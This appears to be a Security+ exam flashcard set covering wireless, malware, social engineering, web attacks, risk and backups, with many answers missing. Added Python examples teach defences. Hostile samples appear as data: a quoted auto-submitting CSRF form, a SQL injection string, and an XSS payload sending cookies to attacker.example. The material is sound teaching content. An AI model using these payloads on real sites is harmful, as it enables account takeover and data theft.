Wi-Fi Protected Access II with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (WPA2 CCMP)
Your organization is planning to implement a wireless network using WPA2 Enterprise. Of the following choices, what is required?
An authentication server with a digital certificate installed on the authentication server.
WPA2 Enterprise requires an ______________ authentication server and most implementations require a digital certificate installed on the server.
You are assisting a small business owner in setting up a public wireless hot spot for her customers. Which of the following actions are MOST appropriate for this hot spot?
Enabling Open System Authentication
Open System Authentication is a good choice for a public wireless hot spot. It is used with ______________ and doesn't require users to enter a preshared key or passphrase.
Wired Equivalent Privacy (WEP)
Homer is able to connect to his company's wireless network with his smartphone but not with his laptop computer. Which of the following is the MOST likely reason for this disparity?
His company's network has a MAC address filter in place.
Management asks you if you can modify the wireless network to prevent users from easily discovering it. Which of the following would you modify to meet this goal?
A war driver is capturing traffic from a wireless network. When an authorized client connects, the attacker is able to implement a brute force attack to discover the encryption key. What type of attack did this war driver use?
______________ refers to two devices communicating when they are close to each other.
Near Field Communication (NFC)
An attacker is able to access email contact lists on your smartphone. What type of attack is this?
Attackers are able to access data (including email contact lists) on a smartphone in a ______________.
______________ is the practice of sending unsolicited messages to other Bluetooth devices.
Your organization is planning to implement a VPN and wants to ensure it is secure. Which of the following protocols is the BEST choice to use with the VPN?
IPsec is one of several protocols used to secure VPN traffic. ______________ is an older protocol used with VPNs but it is not as secure as IPsec. SFTP secures FTP transmissions, but not VPNs.
An automated process isolated a computer in a restricted VLAN because the process noticed the computer's antivirus definitions were not up to date. What is the name of this process?
Network Access Control (NAC)
Network Access Control (NAC) is a group of technologies that can inspect systems and control their access to a network. NAC can change a computer's IP address to quarantine it in a ______________.
Your organization wants to improve the security posture of internal database servers and protect against zero-day vulnerabilities. Of the following choices, what provides the BEST solution?
Disabling unnecessary services
Disabling unnecessary services helps reduce threats, including threats from __________. It also reduces the threat from open ports on a firewall if the associated services are disabled.
You need to monitor the security posture of several servers in your organization and keep a security administrator aware of their status. Which of the following tasks will BEST help you meet this goal?
Establishing baseline reporting
Establishing baseline reporting processes allows you to monitor the systems and identify any changes from the baseline that might affect their security posture. You would determine the _________ prior to establishing a baseline.
Maggie is compiling a list of approved software for desktop operating systems within a company. What is the MOST likely purpose of this list?
Host software baseline
A host software baseline, also called an __________________, identifies a list of approved software for systems and compares it with installed applications.
An _____________________ identifies proper settings for applications.
application configuration baseline
Your organization wants to ensure that employees do not install or play operating system games, such as solitaire and FreeCell, on their computers. Which of the following is the BEST choice to prevent this?
Application whitelisting identifies authorized applications and prevents users from installing or running any other applications. An Application _____________ can be used to identify specific applications that cannot be installed or run on a system.
A ________________ can state a rule to discourage a behavior, such as installing and playing games during work, but it doesn't enforce the rule by preventing users from installing or running the software.
An IT department recently had its hardware budget reduced, but the organization still expects them to maintain availability of services. Of the following choices, what would BEST help them maintain availability with a reduced budget?
________________ provides increased availability because it is much easier to rebuild a virtual server than a physical server after a failure. It also supports a reduced budget because virtual servers require less hardware, less space in a data center, less power, and less heating and air conditioning.
You are preparing to deploy a new application on a virtual server. The virtual server hosts another server application that employees routinely access. Which of the following is the BEST method to use when deploying the new application?
Taking a snapshot of the VM before deploying the new application.
A recent risk assessment identified several problems with servers in your organization. They occasionally reboot on their own and the operating systems do not have current security fixes. Administrators have had to rebuild some servers from scratch due to mysterious problems. Which of the following solutions will mitigate these problems?
Administrators ensure server operating systems are updated at least once a month with relevant patches, but they do not track other software updates. Of the following choices, what is the BEST choice to mitigate risks on these servers?
Application Patch Management
Homer noticed that several generators within the nuclear power plant have been turning on without user interaction. Security investigators discovered that an unauthorized file was installed and causing these generators to start at timed intervals. Further, they determined this file was installed during a visit by external engineers. What should Homer recommend to mitigate this threat in the future?
Configure the SCADA within a VLAN to isolate them
Your company has recently provided mobile devices to several employees. A security manager has expressed concerns related to data saved on these devices. Which of the following would BEST address these concerns?
Disabling the use of removable media
Which of the following is the MOST likely negative result if administrators do not implement access controls correctly on an encrypted USB hard drive?
Security controls can be bypassed
Your company provides electrical and plumbing services to homeowners. Employees use tablets during service calls to record activity, create invoices, and accept credit card payments. Which of the following would BEST prevent disclosure of customer data if any of these devices are lost or stolen?
Key personnel in your organization have mobile devices, which store sensitive information. What can you implement to prevent data loss from these devices if a thief steals one?
Screen lock, account lockouts, full device encryption, and remote wipe capabilities
Which of the following represents a primary security concern when authorizing mobile devices on a network?
Your company is planning on implementing a policy for users so that they can connect their mobile devices to the network. However, management wants to restrict network access for these devices. They should have Internet access and be able to access some internal servers, but management wants to ensure that they do not have access to the primary network where company-owned devices operate. Which of the following will BEST meet this goal?
Your organization hosts a web site with a back-end database. The database stores customer data, including credit card numbers. Which of the following is the BEST way to protect the credit card data?
Database column encryption
___________ can be used to encrypt the fields holding credit card data, but not fields that don't need to be encrypted.
Database column (or field) encryption
Bart copied an encrypted file from his desktop computer to his USB drive and discovered that the copied file isn't encrypted. He asks you what he can do to ensure files he's encrypted remain encrypted when he copies them to a USB drive. What would you recommend as the BEST solution to this problem?
Use whole disk encryption on the USB drive
Management wants to ensure that employees do not print any documents that include customer PII. Which of the following solutions would meet this goal?
A ___________ solution can limit documents sent to a printer to be printed using content filters.
data loss prevention (DLP)
A hardware security module (HSM) and trusted platform module (TPM) provide ___________.
Full disk encryption
Of the following choices, which one is a cloud computing option that allows customers to apply patches to the operating system?
Infrastructure as a service (IAAS)
___________ is a cloud computing option where the vendor provides access to a computer, but customers must manage the system, including keeping it up to date with current patches.
Infrastructure as a service (IAAS)
Which of the following types of malware is the MOST difficult to reverse engineer?
Recently, malware on a company computer destroyed several important files after it detected that Homer was no longer employed at the company. Which of the following BEST identifies this malware?
An _________ uses one or more techniques to make it difficult for antivirus researchers to reverse engineer it.
A _________ executes in response to an event.
A recent antivirus scan on a server detected a Trojan. A technician removed the Trojan, but a security administrator expressed concern that unauthorized personnel might be able to access data on the server. The security administrator decided to check the server further. Of the following choices, what is the administrator MOST likely looking for on this server?
After Maggie turned on her computer, she saw a message indicating that unless she made a payment, her hard drive would be formatted. What does this indicate?
A security administrator recently noticed abnormal activity on a workstation. It is connecting to computers outside the organization's internal network, using uncommon ports. Using a security toolkit, the administrator discovered the computer is also running several hidden processes. Which of the following choices BEST indicates what the administrator found?
A _________ typically runs processes that are hidden and it also attempts to connect to computers via the Internet.
What type of malware uses marketing pop-ups and does not attempt to hide itself?
Of the following malware types, which one is MOST likely to monitor a user's computer?
Lisa is a database administrator and received a phone call from someone identifying himself as a technician working with a known hardware vendor. The technician said he's aware of a problem with database servers they've sold, but it only affects certain operating system versions. He asks Lisa what operating system the company is running on its database servers. Which of the following choices is the BEST response from Lisa?
Thank the caller, end the call, report the call to her supervisor, and independently check the vendor for issues.
A security administrator at a shopping mall discovered two wireless cameras pointing at an ATM. These cameras were not installed by mall personnel and are not authorized. What is the MOST likely goal of these cameras?
Bart is in a break area outside the office. He told Lisa that he forgot his badge inside and asked Lisa to let him follow her when she goes back inside. What does this describe?
An organization's security policy requires employees to incinerate paper documents. Of the following choices, which type of attack is this MOST likely to prevent?
While cleaning out his desk, Bart threw several papers containing PII into the recycle bin. Which type of attack can exploit this action?
Marge reports that she keeps receiving unwanted emails about personal loans. What does this describe?
A recent spear phishing attack that appeared to come from your organization's CEO resulted in several employees revealing their passwords to attackers. Management wants to implement a security control to provide assurances to employees that email that appears to come from the CEO actually came from the CEO. Which of the following should be implemented?
Attackers are targeting C-level executives in your organization. Which type of attack is this?
You manage a group of computers in an isolated network without Internet access. You need to update the antivirus definitions manually on these computers. Which of the following choices is the MOST important concern?
Ensuring the definition file hash is equal to the hash on the antivirus vendor's website
A user wants to reduce the threat of an attacker capturing her personal information while she surfs the Internet. Which of the following is the BEST choice?
Bart is complaining that new browser windows keep opening on his computer. Which of the following is the BEST choice to stop these in the future?
Your organization recently suffered a loss from malware that wasn't previously known by any trusted sources. Which type of attack is this?
Homer received an email advertising the newest version of a popular smartphone, which is not available elsewhere. It includes a malicious link. Which of the following principles is the email author using?
A user complains that his system is no longer able to access the blogs.getcertifiedahead.com site. Instead, his browser goes to a different site. After investigation, you notice the following entries in the user's hosts file:
What is the BEST explanation for this entry?
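A hosts-file override beats DNS, so an entry that pins a public name to an attacker's address sends the browser elsewhere (pharming). The following is an added example, not part of the original card set: a small Python scanner that parses a hosts file and flags names mapped outside the networks an administrator would legitimately pin. The sample hosts content, the 203.0.113.9 address and the trusted-network list are constructed for the example.

```python
import ipaddress

# Constructed hosts file content: two normal loopback entries, one legitimate
# internal override, and two public names redirected to a foreign address.
SAMPLE_HOSTS = """\
# Standard entries
127.0.0.1       localhost
::1             localhost
# Suspicious: public sites pinned to an address outside the organisation
203.0.113.9     blogs.getcertifiedahead.com
203.0.113.9     www.bank.example
10.0.0.5        intranet.example   # legitimate internal override
"""

LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def parse_hosts(text: str):
    """Yield (ip, hostname) pairs, ignoring comments and blank lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower()


def suspicious_entries(text: str,
                       trusted_networks=("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")):
    """Flag every non-loopback name mapped to an address outside the trusted ranges.

    Public names should not appear in the hosts file at all; when they do, and
    point somewhere the organisation does not control, the browser is being
    redirected before DNS is ever consulted.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    flagged = []
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            flagged.append((ip, name))      # unparsable address is itself suspicious
            continue
        if name in LOOPBACK_NAMES and addr.is_loopback:
            continue
        if any(addr in n for n in nets):
            continue
        flagged.append((ip, name))
    return flagged


if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"suspicious hosts entry: {name} -> {ip}")
```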
Homer recently received an email thanking him for a purchase that he did not make. He asked an administrator about it and the administrator noticed a pop-up window, which included the following code:
<body onload="document.getElementById('myForm').submit()"><form id="myForm" action="gcgapremium.com/purchase.php" method="post"><input name="Buy Now" value="Buy Now" /></form></body>
What is the MOST likely explanation?
cross-site request forgery attack (XSRF)
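The forged form above works because the browser attaches Homer's session cookie to the auto-submitted POST, and the server trusts the cookie alone. The following is an added example, not code from the original card set: a Python sketch of a purchase handler in its vulnerable form and with a per-session anti-CSRF token, exercised against a forged POST that carries the cookie but not the token. The Session class, the form field names and the handler functions are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side state for one logged-in user (constructed for this example)."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


def render_purchase_form(session: Session) -> str:
    """The legitimate page embeds the per-session token as a hidden field."""
    return (
        '<form action="/purchase.php" method="post">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input type="submit" name="Buy Now" value="Buy Now">'
        "</form>"
    )


def handle_purchase_vulnerable(session: Session, form: dict) -> str:
    """Trusts the session cookie alone, so any page the victim loads can buy."""
    return f"purchase completed for {session.user}"


def handle_purchase_protected(session: Session, form: dict) -> str:
    """Requires the form token to match the session token.

    The attacker's page runs on a different origin and cannot read the
    victim's token, so the forged POST arrives without it (or with a guess).
    """
    submitted = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(submitted, session.csrf_token.encode()):
        return "rejected: missing or invalid CSRF token"
    return f"purchase completed for {session.user}"


# What the browser sends from the attacker's hidden form: the victim's cookie
# rides along automatically, but no token is present.
FORGED_FORM = {"Buy Now": "Buy Now"}


def demo() -> dict:
    victim = Session(user="homer")
    legit_form = {"csrf_token": victim.csrf_token, "Buy Now": "Buy Now"}
    return {
        "vulnerable_forged": handle_purchase_vulnerable(victim, FORGED_FORM),
        "protected_forged": handle_purchase_protected(victim, FORGED_FORM),
        "protected_legit": handle_purchase_protected(victim, legit_form),
    }


if __name__ == "__main__":
    for outcome, result in demo().items():
        print(f"{outcome}: {result}")
```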
An IDS alerts on increased traffic. Upon investigation, you realize it is due to a spike in network traffic from several sources. Assuming this is malicious, what is the MOST likely explanation?
A network administrator needs to ensure the company's network is protected against smurf attacks. What should the network administrator do?
Verify border routers block directed broadcasts
__________ are blocked by preventing routers from passing directed broadcasts, especially border routers with direct access to the Internet.
Some protocols include timestamps and sequence numbers. These components help protect against what type of attacks?
Which of the following is the BEST method to protect against someone trying to guess the correct PIN to withdraw money from an ATM?
An application stores user passwords in a hashed format. Which of the following can decrease the likelihood that attackers can discover these passwords?
Security analysts recently discovered that users in your organization are inadvertently installing malware on their systems after visiting the compai.org web site. What is the MOST likely explanation for this activity?
An attacker recently attacked a web server hosted by your company. After investigation, security professionals determined that the attacker used a previously unknown application exploit. Which of the following BEST identifies this attack?
Which of the following developer techniques results in significant security vulnerabilities for online web site applications?
poor input validation
Buffer overflow and cross-site request forgery (XSRF) attacks can be mitigated by _________.
An attacker is bypassing client-side input validation by intercepting and modifying data within the HTTP POST command. Which of the following does the attacker use in this attack?
An attacker can use a web proxy to intercept the _____________ command. The attacker then modifies the data in the command and sends it to the web site.
______________ catches errors, allowing applications to handle them gracefully.
Web developers are implementing error and exception handling in a web site application. Which of the following represents a best practice for this?
Displaying a generic error message but logging detailed information about the error.
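Client-side validation only protects the honest user's browser; an attacker with an intercepting proxy edits the POST body after that JavaScript has run, so the server must re-validate every field and, when it rejects one, log the detail while showing the client a generic message. The following is an added example, not code from the original card set: a Python POST handler doing both. The field names, the SKU format, the quantity range and the reference-ID scheme are assumptions made for the example.

```python
import logging
import re
import uuid

log = logging.getLogger("webapp")
logging.basicConfig(level=logging.INFO)

# Constructed server-side rules. The browser may enforce the same ones, but the
# server never relies on that having happened.
QUANTITY_RANGE = (1, 10)
SKU_PATTERN = re.compile(r"[A-Z]{3}-\d{4}")


class ValidationError(ValueError):
    pass


def validate_order(form: dict) -> dict:
    """Return a cleaned, typed copy of the POST fields or raise ValidationError."""
    sku = str(form.get("sku", ""))
    if not SKU_PATTERN.fullmatch(sku):
        raise ValidationError(f"bad sku {sku!r}")
    try:
        qty = int(form.get("quantity", ""))
    except ValueError:
        raise ValidationError(f"quantity not an integer: {form.get('quantity')!r}")
    lo, hi = QUANTITY_RANGE
    if not lo <= qty <= hi:
        raise ValidationError(f"quantity {qty} outside {lo}-{hi}")
    # Price is computed server-side; a client-supplied 'price' field is ignored.
    return {"sku": sku, "quantity": qty}


def handle_post(form: dict) -> tuple:
    """Generic message to the client, full detail to the log, tied by a reference ID."""
    ref = uuid.uuid4().hex[:8]
    try:
        order = validate_order(form)
    except ValidationError as exc:
        log.warning("ref=%s rejected POST %r: %s", ref, form, exc)
        return 400, f"Request could not be processed (ref {ref})"
    except Exception:
        log.exception("ref=%s unexpected error handling %r", ref, form)
        return 500, f"An internal error occurred (ref {ref})"
    return 200, f"Order accepted: {order['quantity']} x {order['sku']}"


# Constructed POST bodies: one as the browser sends it, one edited in a proxy
# to slip past the browser-side checks (negative quantity, tampered price).
NORMAL_POST = {"sku": "ABC-1234", "quantity": "2"}
TAMPERED_POST = {"sku": "ABC-1234", "quantity": "-5", "price": "0.01"}

if __name__ == "__main__":
    print(handle_post(NORMAL_POST))
    print(handle_post(TAMPERED_POST))
```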
While reviewing logs for a web application, a developer notices that it has crashed several times reporting a memory error. Shortly after it crashes, the logs show malicious code that isn't part of a known application. What is MOST likely occurring?
______________ often cause an application to crash and expose system memory. Attackers then write malicious code into the exposed memory and use different techniques to get the system to run this code.
Buffer overflow attacks
An application on one of your database servers has crashed several times recently. Examining detailed debugging logs, you discover that just prior to crashing, the database application is receiving a long series of x90 characters. What is MOST likely occurring?
Buffer overflow attacks include a series of no operation (NOP) commands, such as ______________. When successful, they can crash applications and expose memory, allowing attackers to run malicious code on the system.
hexadecimal 90 (x90)
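A long run of 0x90 bytes is the NOP sled that precedes the injected code, and it is easy to spot in captured input. The following is an added example, not code from the original card set: a Python scanner that measures the longest run of 0x90 in a payload, decodes the "x90 x90 ..." notation a debug log might use, and flags inputs above a threshold. The threshold value, the sample payloads and the log fragment are constructed for the example.

```python
import re

NOP = 0x90
SLED_THRESHOLD = 64   # assumed tuning value; real sleds are often hundreds of bytes


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 bytes in the payload."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == NOP else 0
        best = max(best, cur)
    return best


def looks_like_sled(data: bytes, threshold: int = SLED_THRESHOLD) -> bool:
    return longest_nop_run(data) >= threshold


def decode_hex_dump(text: str) -> bytes:
    """Turn 'x90' / '0x90' / '\\x90' tokens from a debug log back into bytes."""
    tokens = re.findall(r"\b(?:0x|x)([0-9a-fA-F]{2})\b", text)
    return bytes(int(t, 16) for t in tokens)


# Constructed samples: a benign query, a 300-byte sled followed by placeholder
# opcode bytes, and a log line written in the x90 notation.
BENIGN = b"SELECT name FROM accounts WHERE id = 42"
SLED = b"\x90" * 300 + b"\xcc" * 16
LOG_FRAGMENT = "recv: " + " ".join(["x90"] * 120) + " x31 xc0 x50"


def scan(samples: dict) -> dict:
    """Map each sample name to whether it carries a sled."""
    return {name: looks_like_sled(data) for name, data in samples.items()}


if __name__ == "__main__":
    results = scan({"benign": BENIGN, "sled": SLED, "log": decode_hex_dump(LOG_FRAGMENT)})
    for name, hit in results.items():
        print(f"{name}: {'NOP sled detected' if hit else 'clean'}")
```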
Attackers have attacked an online web server using a SQL injection attack. Which of the following BEST describes this?
The attacker is attempting to pass commands to a back-end database server to access data.
A _________________ can be blocked by using input validation techniques to filter special characters such as the < and > characters used in HTML code.
cross-site scripting (XSS) attack
Which of the following is an attack against servers hosting a directory service?
LDAP injection attack
An LDAP injection attack attempts to access data on servers hosting a directory service, such as a Microsoft domain controller hosting ____________.
Cross-site scripting (XSS) and cross-site request forgery (XSRF) attacks attack ___________.
Your organization hosts a web site within a DMZ and the web site accesses a database server in the internal network. ACLs on firewalls prevent any connections to the database server except from the web server. Database fields holding customer data are encrypted and all data in transit between the web site server and the database server are encrypted. Which of the following represents the GREATEST risk to the data on the server?
A _________________ allows an attacker to send commands to the database server to access data.
SQL injection attack
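Both injection families above come down to user input being parsed as code: as SQL grammar by the database, or as HTML by the browser. The following is an added example, not code from the original card set: a Python demonstration using an in-memory SQLite table that shows a concatenated query leaking every row to the classic `' OR '1'='1` input, the same lookup with a parameterized query returning nothing, and HTML output encoding neutralising a script payload. The table, its rows and the attacker strings are constructed for the example.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows standing in for a customer database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("homer", "homer@example.test"), ("marge", "marge@example.test")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, name: str) -> list:
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = f"SELECT name, email FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, name: str) -> list:
    """Placeholder binding: the driver passes the value as data, never as SQL."""
    return con.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def render_comment(comment: str) -> str:
    """Output encoding for XSS: < > & " ' become entities, so the browser shows the
    text rather than executing it. Encoding on output is more robust than
    stripping a blacklist of characters on input."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


INJECTION = "' OR '1'='1"
XSS = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def demo() -> dict:
    con = make_db()
    return {
        "vulnerable_rows": len(lookup_vulnerable(con, INJECTION)),       # every row leaks
        "parameterized_rows": len(lookup_parameterized(con, INJECTION)), # no such name
        "rendered": render_comment(XSS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```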
A security tester is sending random data to a program. What does this describe?
Your organization is preparing to deploy a web-based application which will accept user input. Which of the following test the reliability of this application to maintain availability and data integrity?
While analyzing a packet capture log, you notice the following entry:
16:12:50, src 10.80.1.5:3389, dst 192.168.1.100:8080, syn/ack
Of the following choices, what is the BEST explanation of this entry?
An RDP connection attempt
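The flags identify which side is the server: a SYN goes to the service port and a SYN/ACK comes back from it, so port 3389 on the source, not 8080 on the destination, names the service here. The following is an added example, not code from the original card set: a Python parser for entries in this format that applies that rule over a few constructed capture lines (the first mirrors the entry above; the others and the port table are assumptions made for the example).

```python
import re
from dataclasses import dataclass

# Constructed subset of well-known service ports used to interpret captures.
PORTS = {22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS", 80: "HTTP", 443: "HTTPS",
         445: "SMB", 1433: "MSSQL", 3306: "MySQL", 3389: "RDP"}

LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2}),\s*src\s+(?P<src>[\d.]+):(?P<sport>\d+),"
    r"\s*dst\s+(?P<dst>[\d.]+):(?P<dport>\d+),\s*(?P<flags>[A-Za-z/]+)$"
)


@dataclass
class Entry:
    time: str
    src: str
    sport: int
    dst: str
    dport: int
    flags: str


def parse_line(line: str) -> Entry:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised entry: {line!r}")
    d = m.groupdict()
    return Entry(d["time"], d["src"], int(d["sport"]), d["dst"], int(d["dport"]), d["flags"].lower())


def service_name(port: int) -> str:
    return PORTS.get(port, f"port {port}")


def explain(e: Entry) -> str:
    """Name the service by the side the TCP flags mark as the server."""
    if e.flags == "syn":
        return f"{service_name(e.dport)} connection attempt from {e.src} to {e.dst}"
    if e.flags == "syn/ack":
        return f"{service_name(e.sport)} connection attempt: {e.src} answering client {e.dst}"
    if e.flags in ("rst", "rst/ack"):
        return f"connection reset involving {service_name(min(e.sport, e.dport))}"
    return f"{service_name(min(e.sport, e.dport))} traffic, flags {e.flags}"


# Constructed capture lines; the first mirrors the entry quoted above.
SAMPLE_LOG = """\
16:12:50, src 10.80.1.5:3389, dst 192.168.1.100:8080, syn/ack
16:12:49, src 192.168.1.100:8080, dst 10.80.1.5:3389, syn
16:13:02, src 192.168.1.77:51044, dst 10.80.1.9:23, syn
16:13:02, src 10.80.1.9:23, dst 192.168.1.77:51044, rst/ack
"""


def summarize(log: str) -> list:
    return [explain(parse_line(line)) for line in log.splitlines() if line.strip()]


if __name__ == "__main__":
    for summary in summarize(SAMPLE_LOG):
        print(summary)
```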
Which of the following is most closely associated with residual risk?
____________ is the risk that an organization accepts after implementing controls to reduce risk.
____________ attempts to discourage attacks with preventative controls such as a security guard.
___________ reduces risks through internal controls.
Purchasing insurance is a common method of ____________.
You need to calculate the ALE for a server. The value of the server is $3,000, but it has crashed 10 times in the past year. Each time it crashed, it resulted in a 10 percent loss. What is the ALE?
$3,000. It is calculated as SLE x ARO ($300 x 10).
You need to calculate the expected loss of an incident. Which of the following value combinations would you MOST likely use?
ALE and ARO. The expected loss is the SLE, and you can calculate it from the ALE and ARO as ALE / ARO.
You want to identify all of the services running on a server. Which of the following tools is the BEST choice to meet this goal?
A ______________ identifies open ports on a system and is commonly used to determine what services are running on the system.
You recently completed a vulnerability scan on your network. It reported that several servers are missing key operating system patches. However, after checking the servers, you've verified the servers have these patches installed. Which of the following BEST describes this?
You suspect that a database server used by a web application does not have current patches. Which of the following is the BEST action to take to verify the server has up-to-date patches?
You need to perform tests on your network to identify missing security controls. However, you want to have the least impact on systems that users are accessing. Which of the following tools is the best to meet this need?
Lisa needs to identify if a risk exists on a web application and if attackers can potentially bypass security controls. However, she should not actively test the application. Which of the following is the BEST choice?
Perform a vulnerability scan
A recent vulnerability scan reported that a web application server is missing some patches. However, after inspecting the server, you realize that the patches are for a protocol that administrators removed from the system. Which of the following is the BEST explanation for this disparity?
A ______________ on a vulnerability scan indicates that a vulnerability is positively detected, but the vulnerability doesn't actually exist.
A ______________ on a vulnerability scan indicates that the vulnerability scan did not detect a vulnerability that does exist on a system.
Your organization develops web application software, which it sells to other companies for commercial use. Your organization wants to ensure that the software isn't susceptible to common vulnerabilities, such as buffer overflow attacks and race conditions. What should the organization implement to ensure software meets this standard?
A ____________ goes line-by-line through the software code looking for vulnerabilities, such as buffer overflows and race conditions.
_______________ helps prevent buffer overflows, but not race conditions.
_____________ controls help prevent unintended outages from unauthorized changes.
_____________ is a type of testing used to ensure that new patches do not cause errors.
An organization has a legacy server within the DMZ. It is running older software that is not compatible with current patches, so it remains unpatched. Management accepts the risk on this system, but wants to know if attackers can access the internal network if they successfully compromise this server. Which of the following is the MOST appropriate test?
Testers do not have access to product documentation or any experience with an application. What type of test will they MOST likely perform?
Your organization has hired a group of external testers to perform a black box penetration test. One of the testers asks you to provide information about your internal network. What should you provide?
Black box testers should not have access to any information before starting the test, so technicians and administrators should not provide any information if asked. It is appropriate to give ______________ testers all the information on the network.
A network administrator is troubleshooting a communication problem between a web server and a database server. Which of the following tools would MOST likely be useful in this scenario?
A ____________ is useful for capturing traffic between systems for analysis.
A network administrator needs to identify the type of traffic and packet flags used in traffic sent from a specific IP address. Which of the following is the BEST tool to meet this need?
Security administrators have recently implemented several security controls to enhance the network's security posture. Management wants to ensure that these controls continue to function as intended. Which of the following tools is the BEST choice to meet this goal?
Your organization recently hired an outside security auditor to review internal processes. The auditor identified several employees who had permissions for previously held jobs within the company. What should the organization implement to prevent this in the future?
user rights and permissions reviews
Your organization's security policy states that administrators should follow the principle of least privilege. Which of the following tools can ensure that administrators are following the policy?
user rights and permissions review
Your organization wants to ensure that security controls continue to function, helping to maintain an appropriate security posture. Which of the following is the BEST choice to meet this goal?
continuous security monitoring
While creating a web application, a developer adds code to limit data provided by users. The code prevents users from entering special characters. Which of the following attacks will this code MOST likely prevent?
A ______________ captures traffic and then performs an offline brute force attack to discover the encryption key.
Wi-Fi Protected Access (WPA) cracking attack
An organization needs to improve fault tolerance to increase data availability. However, the organization has a limited budget. Which of the following is the BEST choice to meet the organization's needs?
Your organization hosts a web site with a back-end database server. During a recent power outage, the server crashed, resulting in a significant amount of lost data. Which of the following can your organization implement to prevent this loss from occurring again?
The ________________ identifies the time period when you plan to restore a system after an outage.
Recovery Time Objective (RTO)
A network administrator configured several servers to work together to increase the processing capabilities for a web application. What does the administrator MOST likely implement?
_____________ shifts the load between multiple servers to increase the number of clients the application can handle, ultimately increasing the overall processing capabilities.
______________ adds one or more servers for high availability; it also shifts the load among multiple systems and can increase a site's availability by adding additional nodes when necessary, but does not increase processing capabilities.
A redundant array of inexpensive disks (___________) provides fault tolerance for the disk subsystem, but does not increase processing capabilities.
Your company's web site experiences a large number of client requests during certain times of the year. Which of the following could your company add to ensure the web site's availability during these times?
Your organization hosts a high-volume web site, which generates a significant amount of revenue. You are asked to recommend a method to increase the availability of this web site. Which of the following choices is the BEST choice?
Your backup policy for a database server dictates that the amount of time needed to perform backups should be minimized. Which of the following backup plans would BEST meet this need?
Full backups on Sunday and incremental backups every other day of the week.
After a full backup, _________ backups back up data that has changed or is different since the last full backup. For example, if a full backup was on Sunday night, on Monday night, all files that changed since Sunday night would be backed up and on Tuesday night, all files would again be backed up that had changed from the Sunday night full backup.
After a full backup, _________ backups back up data that has changed since the last backup. This includes either the last full backup, or the last incremental backup. For example, if a full backup was on Sunday night, on Monday night, all files that changed since Sunday night would be backed up and on Tuesday night, only the files that changed since the Monday night backup would be backed up.
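The two descriptions above are easiest to compare by simulating a week. The following is an added example, not code from the original card set: a Python model that takes a constructed set of daily file changes after a Sunday full backup, lists what a differential and an incremental scheme each copy per night, totals the weekly copy volume (the incremental total is smaller, which is why it minimises backup time), and counts how many backup sets a restore on a given day must read back (differential needs only two). The file names and change history are assumptions made for the example.

```python
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]

# Constructed change history: files modified on each day. Sunday is the full
# backup, so every file counts as "changed" that night.
CHANGES = {
    "Sun": {"a", "b", "c", "d", "e"},
    "Mon": {"a"},
    "Tue": {"b", "c"},
    "Wed": set(),
    "Thu": {"a", "d"},
    "Fri": {"e"},
    "Sat": {"b"},
}


def plan(scheme: str, changes: dict = CHANGES) -> dict:
    """Return {day: set of files copied that night} for the given scheme."""
    if scheme not in ("differential", "incremental"):
        raise ValueError(f"unknown scheme {scheme!r}")
    copied = {}
    since_full = set()                      # everything changed since the last full
    for day in DAYS:
        if day == "Sun":
            copied[day] = set(changes[day]) # full backup
            since_full = set()
            continue
        since_full |= changes[day]
        if scheme == "differential":
            copied[day] = set(since_full)   # grows every night until the next full
        else:
            copied[day] = set(changes[day]) # only what changed since last night
    return copied


def total_copies(scheme: str) -> int:
    """Files written by the nightly (non-full) backups: a proxy for backup time."""
    return sum(len(files) for day, files in plan(scheme).items() if day != "Sun")


def sets_needed_to_restore(scheme: str, day: str) -> int:
    """How many backup sets a restore to the state of `day` must read back."""
    idx = DAYS.index(day)
    if scheme == "differential":
        return 1 if idx == 0 else 2         # full + the latest differential
    return idx + 1                          # full + every incremental so far


if __name__ == "__main__":
    for scheme in ("differential", "incremental"):
        nightly = {d: sorted(f) for d, f in plan(scheme).items()}
        print(f"{scheme}: {nightly}")
        print(f"  weekly copies: {total_copies(scheme)}, "
              f"sets to restore Saturday: {sets_needed_to_restore(scheme, 'Sat')}")
```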
A business continuity expert is creating a business impact analysis (BIA). Which of the following elements is MOST likely to be omitted from the BIA?
A _____________ identifies critical systems, components, and functions, dependencies, critical downtime limits, potential scenarios causing a loss, and the potential loss; however, it does not include recommended solutions, recovery methods, or procedures.
business impact analysis (BIA)
After a recent attack causing a data breach, an executive is analyzing the financial losses. She determined that the attack is likely to cost at least $1 million. She wants to ensure that this information is documented for future planning purposes. Where is she MOST likely to document it?
business impact analysis (BIA)
A __________________ includes methods used to recover from an outage. It typically includes a hierarchical list of critical systems that identifies what to restore and in what order.
disaster recovery plan (DRP)
